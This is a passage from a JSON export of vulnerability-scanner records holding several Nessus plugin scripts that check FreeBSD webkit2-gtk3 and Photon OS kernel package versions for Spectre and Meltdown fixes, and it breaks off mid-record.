{"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13783", "CVE-2017-13784", "CVE-2017-13785", "CVE-2017-13788", "CVE-2017-13791", "CVE-2017-13792", "CVE-2017-13794", "CVE-2017-13795", "CVE-2017-13796", "CVE-2017-13798", "CVE-2017-13802", "CVE-2017-13803", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-13884", "CVE-2017-13885", "CVE-2017-5715", "CVE-2017-5753", "CVE-2017-7087", "CVE-2017-7089", "CVE-2017-7090", "CVE-2017-7091", "CVE-2017-7092", "CVE-2017-7093", "CVE-2017-7095", "CVE-2017-7096", "CVE-2017-7098", "CVE-2017-7100", "CVE-2017-7102", "CVE-2017-7104", "CVE-2017-7107", "CVE-2017-7109", "CVE-2017-7111", "CVE-2017-7117", "CVE-2017-7120", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-4088", "CVE-2018-4089", "CVE-2018-4096"], "modified": "2019-07-10T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:webkit2-gtk3", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_1CE95BC7327811E8B52700012E582166.NASL", "href": "https://www.tenable.com/plugins/nessus/108703", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108703);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/07/10 16:04:13\");\n\n script_cve_id(\"CVE-2017-13783\", \"CVE-2017-13784\", \"CVE-2017-13785\", \"CVE-2017-13788\", \"CVE-2017-13791\", \"CVE-2017-13792\", \"CVE-2017-13794\", \"CVE-2017-13795\", \"CVE-2017-13796\", \"CVE-2017-13798\", \"CVE-2017-13802\", \"CVE-2017-13803\", \"CVE-2017-13856\", \"CVE-2017-13866\", \"CVE-2017-13870\", \"CVE-2017-13884\", \"CVE-2017-13885\", \"CVE-2017-5715\", \"CVE-2017-5753\", \"CVE-2017-7087\", \"CVE-2017-7089\", \"CVE-2017-7090\", \"CVE-2017-7091\", \"CVE-2017-7092\", \"CVE-2017-7093\", \"CVE-2017-7095\", \"CVE-2017-7096\", \"CVE-2017-7098\", \"CVE-2017-7100\", \"CVE-2017-7102\", \"CVE-2017-7104\", \"CVE-2017-7107\", \"CVE-2017-7109\", \"CVE-2017-7111\", \"CVE-2017-7117\", \"CVE-2017-7120\", \"CVE-2017-7153\", \"CVE-2017-7156\", \"CVE-2017-7157\", \"CVE-2017-7160\", \"CVE-2017-7161\", \"CVE-2017-7165\", \"CVE-2018-4088\", \"CVE-2018-4089\", \"CVE-2018-4096\");\n script_xref(name:\"IAVA\", value:\"2018-A-0020\");\n\n script_name(english:\"FreeBSD : webkit2-gtk3 -- multiple vulnerabilities (1ce95bc7-3278-11e8-b527-00012e582166) (Spectre)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The WebKit team reports many vulnerabilities.\n\nPlease reference the CVE/URL list for details.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2017-0008.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2017-0009.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2017-0010.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2018-0001.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2018-0002.html\"\n );\n # https://vuxml.freebsd.org/freebsd/1ce95bc7-3278-11e8-b527-00012e582166.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2cac8e99\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:webkit2-gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"webkit2-gtk3>=2.16.6<2.20.0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-30T14:53:28", "description": "An update of [linux] packages for PhotonOS has been released. This kernel update fixes vulnerability CVE-2017-5754 which is commonly known as Meltdown vulnerability.", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-07-24T00:00:00", "type": "nessus", "title": "Photon OS 2.0 : linux (PhotonOS-PHSA-2018-2.0-0010) (Meltdown) (deprecated)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2019-04-05T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:linux", "cpe:/o:vmware:photonos:2.0"], "id": "PHOTONOS_PHSA-2018-2_0-0010.NASL", "href": "https://www.tenable.com/plugins/nessus/111280", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2/7/2019\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2018-2.0-0010. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111280);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/04/05 23:25:07\");\n\n script_cve_id(\"CVE-2017-5754\");\n script_bugtraq_id(102378);\n\n script_name(english:\"Photon OS 2.0 : linux (PhotonOS-PHSA-2018-2.0-0010) (Meltdown) (deprecated)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of [linux] packages for PhotonOS has been released. This\nkernel update fixes vulnerability CVE-2017-5754 which is commonly known as\nMeltdown vulnerability.\");\n # https://github.com/vmware/photon/wiki/Security-Updates-2-10\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4ae01943\");\n script_set_attribute(attribute:\"solution\", value:\"n/a.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5754\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 2.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\npkgs = [\n \"linux-4.9.75-1.ph2\",\n \"linux-debuginfo-4.9.75-1.ph2\",\n \"linux-devel-4.9.75-1.ph2\",\n \"linux-docs-4.9.75-1.ph2\",\n \"linux-drivers-gpu-4.9.75-1.ph2\",\n \"linux-esx-4.9.75-1.ph2\",\n \"linux-esx-debuginfo-4.9.75-1.ph2\",\n \"linux-esx-devel-4.9.75-1.ph2\",\n \"linux-esx-docs-4.9.75-1.ph2\",\n \"linux-oprofile-4.9.75-1.ph2\",\n \"linux-secure-4.9.75-1.ph2\",\n \"linux-secure-debuginfo-4.9.75-1.ph2\",\n \"linux-secure-devel-4.9.75-1.ph2\",\n \"linux-secure-docs-4.9.75-1.ph2\",\n \"linux-secure-lkcm-4.9.75-1.ph2\",\n \"linux-sound-4.9.75-1.ph2\",\n \"linux-tools-4.9.75-1.ph2\"\n];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"PhotonOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux\");\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-30T14:54:46", "description": "An update of the linux package has been released.", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2019-02-07T00:00:00", "type": "nessus", "title": "Photon OS 1.0: Linux PHSA-2018-1.0-0097", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2019-04-02T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:linux", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2018-1_0-0097_LINUX.NASL", "href": "https://www.tenable.com/plugins/nessus/121797", "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2018-1.0-0097. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121797);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/04/02 21:54:17\");\n\n script_cve_id(\"CVE-2017-5754\");\n\n script_name(english:\"Photon OS 1.0: Linux PHSA-2018-1.0-0097\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the linux package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-1.0-97.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5754\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-4.4.110-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-debuginfo-4.4.110-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-dev-4.4.110-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-docs-4.4.110-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-drivers-gpu-4.4.110-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-4.4.110-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-debuginfo-4.4.110-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-devel-4.4.110-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-docs-4.4.110-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-oprofile-4.4.110-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-sound-4.4.110-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-tools-4.4.110-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux\");\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-30T14:55:11", "description": "An update of the linux package has been released.", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2019-02-07T00:00:00", "type": "nessus", "title": "Photon OS 2.0: Linux PHSA-2018-2.0-0010", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2019-04-02T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:linux", "cpe:/o:vmware:photonos:2.0"], "id": "PHOTONOS_PHSA-2018-2_0-0010_LINUX.NASL", "href": "https://www.tenable.com/plugins/nessus/121906", "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2018-2.0-0010. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121906);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/04/02 21:54:17\");\n\n script_cve_id(\"CVE-2017-5754\");\n\n script_name(english:\"Photon OS 2.0: Linux PHSA-2018-2.0-0010\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the linux package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-10.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5754\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 2.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-4.9.75-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-debuginfo-4.9.75-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-devel-4.9.75-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-docs-4.9.75-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-drivers-gpu-4.9.75-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-4.9.75-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-debuginfo-4.9.75-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-devel-4.9.75-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-docs-4.9.75-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-oprofile-4.9.75-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-4.9.75-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-debuginfo-4.9.75-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-devel-4.9.75-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-docs-4.9.75-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-lkcm-4.9.75-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-sound-4.9.75-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-tools-4.9.75-1.ph2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux\");\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-30T14:42:52", "description": "USN-3522-1 fixed a vulnerability in the Linux kernel to address Meltdown (CVE-2017-5754). Unfortunately, that update introduced a regression where a few systems failed to boot successfully. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nJann Horn discovered that microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized memory reads via sidechannel 